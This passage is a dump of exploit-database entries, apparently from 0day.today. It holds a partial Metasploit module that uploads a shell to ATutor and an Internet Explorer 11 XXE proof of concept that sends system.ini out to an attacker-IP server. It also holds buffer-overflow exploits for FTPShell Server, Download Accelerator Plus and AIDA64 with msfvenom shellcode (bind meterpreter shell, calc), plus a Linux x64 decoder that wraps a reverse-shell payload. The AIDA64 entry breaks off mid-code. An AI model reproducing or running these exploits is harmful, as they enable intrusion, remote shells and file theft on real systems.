cookie,\r\n 'agent' => 'Mozilla'\r\n })\r\n cookie = \"ATutorID=#{$1};\" if res.get_cookies =~ /ATutorID=(.*);/\r\n return cookie\r\n end\r\n else res.redirection.to_s.include?('admin/index.php')\r\n fail_with(Failure::NoAccess, 'The account is the administrator. Please use a teacher account!')\r\n return cookie\r\n end\r\n end\r\n\r\n fail_with(Failure::NoAccess, \"Authentication failed with username #{username}\")\r\n return nil\r\n end\r\n##\r\n# Exploit controls and information\r\n##\r\n def exploit\r\n tcookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)\r\n print_good(\"Logged in as #{datastore['USERNAME']}\")\r\n\r\n if create_course(tcookie, true)\r\n print_status(\"CSRF Token : \" + @token)\r\n print_status(\"Course Name : \" + @course_name + \" Course ID : \" + @course_id)\r\n print_good(\"New course successfully created.\")\r\n end\r\n\r\n if upload_shell(tcookie, true)\r\n print_good(\"Upload successfully.\")\r\n print_status(\"Trying to exec payload...\")\r\n exec_payload\r\n end\r\n end\r\nend\r\n##\r\n# The end of the adventure (o_O) // AkkuS\r\n##\n\n# 0day.today [2019-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32531"}, {"lastseen": "2019-04-11T21:43:46", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-04-11T00:00:00", "published": "2019-04-11T00:00:00", "id": "1337DAY-ID-32529", "href": "https://0day.today/exploit/description/32529", "title": "Microsoft Internet Explorer 11 XML Injection Exploit", "type": "zdt", "sourceData": "[+] Credits: John Page (aka hyp3rlinx) \r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt\r\n[+] ISR: ApparitionSec \r\n \r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nMicrosoft Internet Explorer v11\r\n(latest version)\r\n\r\nInternet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.\r\n\r\n\r\n[Vulnerability Type]\r\nXML External Entity Injection\r\n\r\n\r\n\r\n[CVE Reference]\r\nN/A\r\n\r\n\r\n\r\n[Security Issue]\r\nInternet Explorer is vulnerable to XML External Entity attack if a user opens a specially crafted .MHT file locally.\r\n\r\nThis can allow remote attackers to potentially exfiltrate Local files and conduct remote reconnaissance on locally installed\r\nProgram version information. Example, a request for \"c:\\Python27\\NEWS.txt\" can return version information for that program.\r\n\r\nUpon opening the malicious \".MHT\" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab \"Ctrl+K\"\r\nand other interactions like right click \"Print Preview\" or \"Print\" commands on the web-page may also trigger the XXE vulnerability.\r\n\r\nHowever, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage.\r\nImportantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities MOTW may not work as advertised.\r\n\r\nTypically, when instantiating ActiveX Objects like \"Microsoft.XMLHTTP\" users will get a security warning bar in IE and be prompted\r\nto activate blocked content. However, when opening a specially crafted .MHT file using malicious <xml> markup tags the user will get no such\r\nactive content or security bar warnings.\r\n\r\ne.g.\r\n\r\nC:\\sec>python -m SimpleHTTPServer\r\nServing HTTP on 0.0.0.0 port 8000 ...\r\n127.0.0.1 - - [10/Apr/2019 20:56:28] \"GET /datatears.xml HTTP/1.1\" 200 -\r\n127.0.0.1 - - [10/Apr/2019 20:56:28] \"GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1\" 200 -\r\n\r\n\r\nTested successfully in latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2.\r\n\r\n\r\n\r\n[POC/Video URL]\r\nhttps://vimeo.com/329717404\r\n\r\n\r\n\r\n[Exploit/POC]\r\nPOC to exfil Windows \"system.ini\" file.\r\nNote: Edit attacker server IP in the script to suit your needs.\r\n\r\n1) Use below script to create the \"datatears.xml\" XML and XXE embedded \"msie-xxe-0day.mht\" MHT file.\r\n\r\n2) python -m SimpleHTTPServer\r\n\r\n3) Place the generated \"datatears.xml\" in Python server web-root.\r\n\r\n4) Open the generated \"msie-xxe-0day.mht\" file, watch your files be exfiltrated.\r\n\r\n\r\n#Microsoft Internet Explorer XXE 0day\r\n#Creates malicious XXE .MHT and XML files\r\n#Open the MHT file in MSIE locally, should exfil system.ini\r\n#By hyp3rlinx \r\n#ApparitionSec\r\n\r\nATTACKER_IP=\"localhost\"\r\nPORT=\"8000\"\r\n\r\nmht_file=(\r\n'From:\\n'\r\n'Subject:\\n'\r\n'Date:\\n'\r\n'MIME-Version: 1.0\\n'\r\n'Content-Type: multipart/related; type=\"text/html\";\\n'\r\n'\\tboundary=\"=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\"\\n'\r\n'This is a multi-part message in MIME format.\\n\\n\\n'\r\n\r\n'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\\n'\r\n'Content-Type: text/html; charset=\"UTF-8\"\\n'\r\n'Content-Location: main.htm\\n\\n'\r\n\r\n'<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/transitional.dtd\">\\n'\r\n'<html>\\n'\r\n'<head>\\n'\r\n'<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\\n'\r\n'<title>MSIE XXE 0day</title>\\n'\r\n'</head>\\n'\r\n'<body>\\n'\r\n'<xml>\\n'\r\n'<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n'\r\n'<!DOCTYPE r [\\n'\r\n'<!ELEMENT r ANY >\\n'\r\n'<!ENTITY % sp SYSTEM \"http://'+str(ATTACKER_IP)+\":\"+PORT+'/datatears.xml\">\\n'\r\n'%sp;\\n'\r\n'%param1;\\n'\r\n']>\\n'\r\n'<r>&exfil;</r>\\n'\r\n'<r>&exfil;</r>\\n'\r\n'<r>&exfil;</r>\\n'\r\n'<r>&exfil;</r>\\n'\r\n'</xml>\\n'\r\n'<script>window.print();</script>\\n'\r\n'<table cellpadding=\"0\" cellspacing=\"0\" border=\"0\">\\n'\r\n'<tr>\\n'\r\n'<td class=\"contentcell-width\">\\n'\r\n'<h1>MSIE XML External Entity 0day PoC.</h1>\\n'\r\n'<h3>Discovery: hyp3rlinx</h3>\\n'\r\n'<h3>ApparitionSec</h3>\\n'\r\n'</td>\\n'\r\n'</tr>\\n'\r\n'</table>\\n'\r\n'</body>\\n'\r\n'</html>\\n\\n\\n'\r\n\r\n'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--'\r\n)\r\n\r\nxml_file=(\r\n'<!ENTITY % data SYSTEM \"c:\\windows\\system.ini\">\\n'\r\n'<!ENTITY % param1 \"<!ENTITY exfil SYSTEM \\'http://'+str(ATTACKER_IP)+\":\"+PORT+'/?%data;\\'>\">\\n'\r\n'<!ENTITY % data SYSTEM \"file:///c:/windows/system.ini\">\\n'\r\n'<!ENTITY % param1 \"<!ENTITY exfil SYSTEM \\'http://'+str(ATTACKER_IP)+\":\"+PORT+'/?%data;\\'>\">\\n'\r\n)\r\n\r\ndef mk_msie_0day_filez(f,p):\r\n f=open(f,\"wb\")\r\n f.write(p)\r\n f.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n mk_msie_0day_filez(\"msie-xxe-0day.mht\",mht_file)\r\n mk_msie_0day_filez(\"datatears.xml\",xml_file)\r\n print \"Microsoft Internet Explorer XML External Entity 0day PoC.\"\r\n print \"Files msie-xxe-0day.mht and datatears.xml Created!.\"\r\n print \"Discovery: Hyp3rlinx / Apparition Security\"\r\n\r\n\n\n# 0day.today [2019-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32529"}, {"lastseen": "2019-04-11T21:41:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-04-10T00:00:00", "published": "2019-04-10T00:00:00", "id": "1337DAY-ID-32525", "href": "https://0day.today/exploit/description/32525", "title": "FTPShell Server 6.83 - Virtual Path Mapping Local Buffer Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: FTP Shell Server 6.83 'Virtual Path Mapping' Buffer Overflow\r\n# Exploit Author: Dino Covotsos - Telspace Systems\r\n# Vendor Homepage: http://www.ftpshell.com/index.htm\r\n# Version: 6.83\r\n# Software Link : http://www.ftpshell.com/downloadserver.htm\r\n# Contact: services[@]telspace.co.za\r\n# Twitter: @telspacesystems\r\n# Tested on: Windows XP SP3 ENG x86\r\n# CVE: TBC from Mitre\r\n# Created during 2019 Intern Training\r\n# Greetz Amy, Delicia, Greg, Tonderai, Nzanoa & Telspace Systems Crew\r\n# PoC:\r\n# 1.) Generate ftpshell.txt, copy the contents to clipboard\r\n# 2.) In the application, open 'Manage FTP Accounts' -> \"Configure Accounts\" -> \"Add Path\"\r\n# 3.) Paste the contents of ftpshell.txt in \"Virtual Path Mapping\"\r\n# 4.) Click \"OK\" and you'll have a bind meterpreter shell on port 443\r\n#7E429353 FFE4 JMP ESP\r\n\r\n#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b \"\\x00\\xd5\\x0a\\x0d\\x1a\\x03\" -f c\r\nshellcode = (\"\\xda\\xc3\\xd9\\x74\\x24\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\\x41\\x58\"\r\n\"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\"\r\n\"\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x6b\\x4c\"\r\n\"\\x4a\\x48\\x6e\\x62\\x33\\x30\\x43\\x30\\x73\\x30\\x43\\x50\\x4f\\x79\\x6a\"\r\n\"\\x45\\x70\\x31\\x59\\x50\\x42\\x44\\x6e\\x6b\\x66\\x30\\x50\\x30\\x4c\\x4b\"\r\n\"\\x53\\x62\\x44\\x4c\\x4c\\x4b\\x31\\x42\\x64\\x54\\x4c\\x4b\\x54\\x32\\x35\"\r\n\"\\x78\\x34\\x4f\\x4d\\x67\\x43\\x7a\\x77\\x56\\x50\\x31\\x39\\x6f\\x6c\\x6c\"\r\n\"\\x47\\x4c\\x30\\x61\\x31\\x6c\\x76\\x62\\x36\\x4c\\x61\\x30\\x79\\x51\\x7a\"\r\n\"\\x6f\\x76\\x6d\\x77\\x71\\x59\\x57\\x4a\\x42\\x5a\\x52\\x32\\x72\\x76\\x37\"\r\n\"\\x6c\\x4b\\x46\\x32\\x34\\x50\\x6e\\x6b\\x30\\x4a\\x45\\x6c\\x4c\\x4b\\x30\"\r\n\"\\x4c\\x36\\x71\\x74\\x38\\x39\\x73\\x30\\x48\\x73\\x31\\x58\\x51\\x46\\x31\"\r\n\"\\x4c\\x4b\\x53\\x69\\x37\\x50\\x56\\x61\\x6b\\x63\\x6e\\x6b\\x32\\x69\\x42\"\r\n\"\\x38\\x68\\x63\\x65\\x6a\\x70\\x49\\x6e\\x6b\\x57\\x44\\x6e\\x6b\\x63\\x31\"\r\n\"\\x7a\\x76\\x54\\x71\\x6b\\x4f\\x4e\\x4c\\x4f\\x31\\x58\\x4f\\x34\\x4d\\x76\"\r\n\"\\x61\\x4f\\x37\\x45\\x68\\x4d\\x30\\x64\\x35\\x68\\x76\\x44\\x43\\x71\\x6d\"\r\n\"\\x7a\\x58\\x45\\x6b\\x53\\x4d\\x67\\x54\\x44\\x35\\x6a\\x44\\x32\\x78\\x6c\"\r\n\"\\x4b\\x50\\x58\\x37\\x54\\x63\\x31\\x6b\\x63\\x75\\x36\\x4e\\x6b\\x34\\x4c\"\r\n\"\\x70\\x4b\\x4e\\x6b\\x62\\x78\\x45\\x4c\\x35\\x51\\x69\\x43\\x6c\\x4b\\x76\"\r\n\"\\x64\\x6c\\x4b\\x66\\x61\\x68\\x50\\x4e\\x69\\x73\\x74\\x55\\x74\\x61\\x34\"\r\n\"\\x51\\x4b\\x33\\x6b\\x61\\x71\\x76\\x39\\x30\\x5a\\x36\\x31\\x6b\\x4f\\x6b\"\r\n\"\\x50\\x71\\x4f\\x51\\x4f\\x71\\x4a\\x4e\\x6b\\x65\\x42\\x38\\x6b\\x6c\\x4d\"\r\n\"\\x31\\x4d\\x70\\x68\\x75\\x63\\x70\\x32\\x63\\x30\\x47\\x70\\x42\\x48\\x54\"\r\n\"\\x37\\x53\\x43\\x76\\x52\\x71\\x4f\\x50\\x54\\x63\\x58\\x32\\x6c\\x34\\x37\"\r\n\"\\x77\\x56\\x54\\x47\\x49\\x6f\\x4e\\x35\\x68\\x38\\x7a\\x30\\x47\\x71\\x43\"\r\n\"\\x30\\x43\\x30\\x57\\x59\\x4a\\x64\\x46\\x34\\x56\\x30\\x35\\x38\\x74\\x69\"\r\n\"\\x4d\\x50\\x50\\x6b\\x57\\x70\\x39\\x6f\\x68\\x55\\x51\\x7a\\x54\\x4b\\x32\"\r\n\"\\x79\\x30\\x50\\x6d\\x32\\x4b\\x4d\\x72\\x4a\\x33\\x31\\x71\\x7a\\x43\\x32\"\r\n\"\\x72\\x48\\x58\\x6a\\x44\\x4f\\x79\\x4f\\x79\\x70\\x79\\x6f\\x5a\\x75\\x6c\"\r\n\"\\x57\\x55\\x38\\x73\\x32\\x67\\x70\\x63\\x31\\x4d\\x6b\\x6f\\x79\\x49\\x76\"\r\n\"\\x62\\x4a\\x62\\x30\\x61\\x46\\x42\\x77\\x75\\x38\\x6a\\x62\\x39\\x4b\\x45\"\r\n\"\\x67\\x35\\x37\\x79\\x6f\\x78\\x55\\x6e\\x65\\x39\\x50\\x62\\x55\\x71\\x48\"\r\n\"\\x31\\x47\\x55\\x38\\x4e\\x57\\x79\\x79\\x65\\x68\\x79\\x6f\\x49\\x6f\\x78\"\r\n\"\\x55\\x32\\x77\\x51\\x78\\x32\\x54\\x48\\x6c\\x75\\x6b\\x68\\x61\\x49\\x6f\"\r\n\"\\x38\\x55\\x51\\x47\\x6f\\x67\\x45\\x38\\x53\\x45\\x62\\x4e\\x50\\x4d\\x55\"\r\n\"\\x31\\x79\\x6f\\x39\\x45\\x72\\x4a\\x53\\x30\\x30\\x6a\\x33\\x34\\x52\\x76\"\r\n\"\\x36\\x37\\x73\\x58\\x64\\x42\\x48\\x59\\x69\\x58\\x53\\x6f\\x49\\x6f\\x38\"\r\n\"\\x55\\x4c\\x43\\x38\\x78\\x53\\x30\\x51\\x6e\\x76\\x4d\\x6e\\x6b\\x57\\x46\"\r\n\"\\x72\\x4a\\x51\\x50\\x61\\x78\\x67\\x70\\x36\\x70\\x75\\x50\\x33\\x30\\x30\"\r\n\"\\x56\\x31\\x7a\\x53\\x30\\x33\\x58\\x43\\x68\\x49\\x34\\x30\\x53\\x69\\x75\"\r\n\"\\x59\\x6f\\x6a\\x75\\x4a\\x33\\x46\\x33\\x43\\x5a\\x43\\x30\\x70\\x56\\x63\"\r\n\"\\x63\\x63\\x67\\x62\\x48\\x77\\x72\\x58\\x59\\x39\\x58\\x53\\x6f\\x4b\\x4f\"\r\n\"\\x49\\x45\\x4d\\x53\\x7a\\x58\\x55\\x50\\x43\\x4e\\x66\\x67\\x56\\x61\\x4b\"\r\n\"\\x73\\x46\\x49\\x69\\x56\\x74\\x35\\x6d\\x39\\x79\\x53\\x4d\\x6b\\x58\\x70\"\r\n\"\\x4d\\x65\\x6e\\x42\\x32\\x76\\x71\\x7a\\x65\\x50\\x56\\x33\\x69\\x6f\\x48\"\r\n\"\\x55\\x41\\x41\")\r\n\r\nbuffer = \"A\" * 395 + \"\\x53\\x93\\x42\\x7e\" + \"\\x90\" * 20 + shellcode + \"C\" * 211\r\n\r\npayload = buffer\r\ntry:\r\n f=open(\"ftpshell.txt\",\"w\")\r\n print \"[+] Creating %s bytes evil payload..\" %len(payload)\r\n f.write(payload)\r\n f.close()\r\n print \"[+] File created!\"\r\nexcept:\r\n print \"File cannot be created\"\n\n# 0day.today [2019-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32525"}, {"lastseen": "2019-04-11T21:42:15", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-04-09T00:00:00", "published": "2019-04-09T00:00:00", "id": "1337DAY-ID-32514", "href": "https://0day.today/exploit/description/32514", "title": "Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python #\r\n# Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow #\r\n# Date: 2019-04-05 #\r\n# Vendor Homepage: http://www.speedbit.com/dap/ #\r\n# Software Link: http://www.speedbit.com/dap/download/downloading.asp #\r\n# Exploit Author: Peyman Forouzan #\r\n# Tested Version: 10.0.6.0 #\r\n# Tested on: Win10 Enterprise 64 bit #\r\n# Note : In other versions of Windows, it will cause the program to Crash #\r\n# Special Thanks to my wife #\r\n# Steps : #\r\n# 1- Run python code : Dap.py ( Dap.txt is created ) #\r\n# 2- Open the APP --> File --> Import --> Html Web Page --> paste in contents from the Dap.txt into #\r\n# Import Web Page --> Ok --> Shellcode (Calc) open #\r\n#---------------------------------------------------------------------------------------------------------#\r\n\r\njunk = \"\\x41\" * 4091\r\n\r\nnseh = \"\\x61\\x62\"\r\nseh = \"\\x57\\x42\"\t\t\t# Overwrite Seh # 0x00420057 : {pivot 8}\r\n\r\nprepare = \"\\x44\\x6e\\x53\\x6e\\x58\\x6e\\x05\"\r\nprepare += \"\\x14\\x11\\x6e\\x2d\\x13\\x11\\x6e\\x50\\x6d\\xc3\"\r\nprepare += \"\\x41\" * 107;\r\n\r\n# calc unicode shell - can be replaced with shellcode\r\ncalc = \"PPYAIAIAIAIAQATAXAZAPA3QADAZA\"\r\ncalc += \"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA\"\r\ncalc += \"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB\"\r\ncalc += \"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K\"\r\ncalc += \"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL\"\r\ncalc += \"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55\"\r\ncalc += \"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V\"\r\ncalc += \"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB\"\r\ncalc += \"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT\"\r\ncalc += \"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU\"\r\ncalc += \"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM\"\r\ncalc += \"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC\"\r\ncalc += \"QQ2LRCM0LJA\";\r\n\r\nbuffer = \"http://\" + junk + nseh + seh + prepare + calc\r\nprint \"[+] Creating %s bytes payload ...\" %len(buffer)\r\nf = open (\"Dap.txt\", \"w\")\r\nprint \"[+] File created!\"\r\nf.write(buffer)\r\nf.close()\n\n# 0day.today [2019-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32514"}, {"lastseen": "2019-04-11T21:46:23", "bulletinFamily": "exploit", "description": "Exploit for linux/x86-64 platform in category shellcode", "modified": "2019-04-09T00:00:00", "published": "2019-04-09T00:00:00", "id": "1337DAY-ID-32518", "href": "https://0day.today/exploit/description/32518", "title": "Linux/x64 - XANAX Decoder Shellcode (127 bytes)", "type": "zdt", "sourceData": "Linux/x64 - XANAX Decoder Shellcode (127 bytes)\r\n\r\n; Date: 08/04/2019\r\n; XANAX Decoder\r\n; Author: Alan Vivona\r\n; Description: Reverts the xor-add-not-add-xor sequence using the same 4 byte key and executes the encoded payload. \r\n; Tested on: x86-x64 GNU/Linux\r\n \r\nglobal _start\r\n \r\nsection .text\r\n \r\nkeys.xor1 equ 0x29\r\nkeys.add1 equ 0xff\r\nkeys.xor2 equ 0x50\r\nkeys.add2 equ 0x05\r\n \r\n; xanax encoded payload\r\npayload.len equ 74 ; this can't be over 127 bytes otherwise it will procude nullbytes\r\n \r\n_start:\r\n \r\n jmp encode_setup\r\n ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex\r\n ; Encoded using XANAX Encoder:\r\n payload_start: db 0x92, 0x55, 0xc4, 0x05, 0x92, 0x8a, 0xdf, 0x92, 0x8d, 0xde, 0x8f, 0x89, 0xf4, 0x17, 0xf4, 0x25, 0x8a, 0x8c, 0x9d, 0xc0, 0xff, 0x8c, 0x8c, 0x8d, 0xdd, 0xf4, 0x35, 0x66, 0x92, 0x9c, 0xc2, 0x92, 0x52, 0xc4, 0x8f, 0x89, 0x92, 0x8b, 0xde, 0xf4, 0x7f, 0x4e, 0x92, 0xad, 0xc4, 0x8f, 0x89, 0xf9, 0x76, 0x92, 0xa3, 0xc4, 0x05, 0xf4, 0x23, 0xaf, 0xea, 0x95, 0xee, 0xaf, 0xfb, 0x94, 0x8c, 0xdb, 0xf4, 0x35, 0x67, 0xda, 0xd7, 0xf4, 0x35, 0x66, 0x8f, 0x89\r\n \r\n encode_setup:\r\n xor rcx, rcx\r\n lea rsi, [rel payload_start]\r\n encode: \r\n mov al, byte [rsi+rcx]\r\n ; XANAX encoding (xor add neg add xor)\r\n xor al, keys.xor2\r\n sub al, keys.add2\r\n not al\r\n sub al, keys.add1\r\n xor al, keys.xor1\r\n \r\n mov byte [rsi+rcx], al\r\n \r\n inc rcx\r\n cmp rcx, payload.len\r\n jne encode\r\n \r\n ; Execute payload\r\n jmp rsi\n\n# 0day.today [2019-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32518"}, {"lastseen": "2019-04-02T21:11:45", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-04-02T00:00:00", "published": "2019-04-02T00:00:00", "id": "1337DAY-ID-32472", "href": "https://0day.today/exploit/description/32472", "title": "AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python #\r\n# Exploit Title: AIDA64 Extreme 5.99.4800 - SEH Buffer Overflow (EggHunter) # #\r\n# Vendor Homepage: https://www.aida64.com #\r\n# Software Link: http://download.aida64.com/aida64extreme599.exe #\r\n# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe #\r\n# Exploit Author: Peyman Forouzan #\r\n# Tested Version: 5.99.4900 #\r\n# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #\r\n# Special Thanks to my wife #\r\n# The program has SEH Buffer Overflow in several places.(this code show one of them) #\r\n# Note 1 : To optimize code, I've used a \"stack pivot\" that is the same in #\r\n# (Extreme, Engineer, Network Audit) Editions. #\r\n# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4800 #\r\n# But the stack pivots in Business Edition are different. #\r\n# Note 2 : All the old versions of the program that are available on the sites like soft32.com, #\r\n# or in https://www.aida64.com/downloads/archive #\r\n# have the same vulnerabily in different offsets (for example version 5.70.3800 ) #\r\n# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions. #\r\n# Steps : #\r\n# 1- Run python code : Aida64.py ( Three files are created ) #\r\n# 2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt #\r\n# into \"Display name\" --> Ok #\r\n# 3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt #\r\n# or egghunter-win10.txt (depend on your windows version) into \"Load from file\" --> Next #\r\n# --> Wait a minute --> Shellcode (Calc) open #\r\n#---------------------------------------------------------------------------------------------------------#\r\n\r\n#------------------------------------ EGG Shellcode Generation ---------------------------------------\r\n\r\nbufsize = 292\r\n\r\n#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg\r\negg = \"w00tw00t\"\r\negg += \"\\x57\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\negg += \"\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\"\r\negg += \"\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\"\r\negg += \"\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\r\negg += \"\\x79\\x6c\\x5a\\x48\\x4e\\x62\\x77\\x70\\x57\\x70\\x63\\x30\\x71\"\r\negg += \"\\x70\\x4b\\x39\\x5a\\x45\\x35\\x61\\x4f\\x30\\x52\\x44\\x4c\\x4b\"\r\negg += \"\\x52\\x70\\x46\\x50\\x6c\\x4b\\x53\\x62\\x54\\x4c\\x6c\\x4b\\x43\"\r\negg += \"\\x62\\x44\\x54\\x6c\\x4b\\x71\\x62\\x51\\x38\\x34\\x4f\\x6e\\x57\"\r\negg += \"\\x31\\x5a\\x36\\x46\\x55\\x61\\x6b\\x4f\\x4c\\x6c\\x37\\x4c\\x75\"\r\negg += \"\\x31\\x73\\x4c\\x45\\x52\\x54\\x6c\\x77\\x50\\x49\\x51\\x48\\x4f\"\r\negg += \"\\x34\\x4d\\x53\\x31\\x69\\x57\\x39\\x72\\x4a\\x52\\x62\\x72\\x43\"\r\negg += \"\\x67\\x6e\\x6b\\x71\\x42\\x52\\x30\\x4c\\x4b\\x70\\x4a\\x47\\x4c\"\r\negg += \"\\x6e\\x6b\\x62\\x6c\\x62\\x31\\x72\\x58\\x6a\\x43\\x70\\x48\\x33\"\r\negg += \"\\x31\\x4e\\x31\\x52\\x71\\x4c\\x4b\\x36\\x39\\x37\\x50\\x63\\x31\"\r\negg += \"\\x5a\\x73\\x4c\\x4b\\x42\\x69\\x52\\x38\\x68\\x63\\x57\\x4a\\x31\"\r\negg += \"\\x59\\x4e\\x6b\\x44\\x74\\x4c\\x4b\\x55\\x51\\x38\\x56\\x50\\x31\"\r\negg += \"\\x6b\\x4f\\x6e\\x4c\\x69\\x51\\x78\\x4f\\x46\\x6d\\x36\\x61\\x58\"\r\negg += \"\\x47\\x46\\x58\\x4b\\x50\\x52\\x55\\x39\\x66\\x65\\x53\\x71\\x6d\"\r\negg += \"\\x79\\x68\\x45\\x6b\\x31\\x6d\\x45\\x74\\x34\\x35\\x7a\\x44\\x52\"\r\negg += \"\\x78\\x4c\\x4b\\x62\\x78\\x77\\x54\\x47\\x71\\x58\\x53\\x75\\x36\"\r\negg += \"\\x6c\\x4b\\x34\\x4c\\x70\\x4b\\x6c\\x4b\\x52\\x78\\x35\\x4c\\x43\"\r\negg += \"\\x31\\x58\\x53\\x6c\\x4b\\x73\\x34\\x6e\\x6b\\x67\\x71\\x58\\x50\"\r\negg += \"\\x6c\\x49\\x73\\x74\\x45\\x74\\x55\\x74\\x63\\x6b\\x61\\x4b\\x33\"\r\negg += \"\\x51\\x32\\x79\\x51\\x4a\\x36\\x31\\x49\\x6f\\x4b\\x50\\x71\\x4f\"\r\negg += \"\\x71\\x4f\\x42\\x7a\\x6c\\x4b\\x44\\x52\\x48\\x6b\\x6e\\x6d\\x31\"\r\negg += \"\\x4d\\x50\\x6a\\x35\\x51\\x6e\\x6d\\x6f\\x75\\x48\\x32\\x55\\x50\"\r\negg += \"\\x75\\x50\\x53\\x30\\x46\\x30\\x55\\x38\\x74\\x71\\x4c\\x4b\\x72\"\r\negg += \"\\x4f\\x4e\\x67\\x69\\x6f\\x6b\\x65\\x4d\\x6b\\x5a\\x50\\x38\\x35\"\r\negg += \"\\x79\\x32\\x56\\x36\\x45\\x38\\x59\\x36\\x6a\\x35\\x6f\\x4d\\x6f\"\r\negg += \"\\x6d\\x69\\x6f\\x59\\x45\\x35\\x6c\\x64\\x46\\x31\\x6c\\x76\\x6a\"\r\negg += \"\\x4b\\x30\\x79\\x6b\\x4b\\x50\\x74\\x35\\x73\\x35\\x4d\\x6b\\x73\"\r\negg += \"\\x77\\x65\\x43\\x71\\x62\\x32\\x4f\\x50\\x6a\\x75\\x50\\x31\\x43\"\r\negg += \"\\x39\\x6f\\x5a\\x75\\x55\\x33\\x43\\x51\\x72\\x4c\\x45\\x33\\x44\"\r\negg += \"\\x6e\\x62\\x45\\x31\\x68\\x62\\x45\\x63\\x30\\x41\\x41\"\r\n\r\nf = open (\"egg.txt\", \"w\")\r\nf.write(egg)\r\nf.close()\r\n\r\n#---------------------------------- EGG Hunter Shellcode Generation ------------------------------------\r\negghunter = \"\\x8b\\x7c\\x24\\x08\\xbe\\xe9\\xfe\\xff\\xff\\xf7\\xde\\x29\\xf7\"\r\negghunter += \"\\x57\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\negghunter += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\r\negghunter += 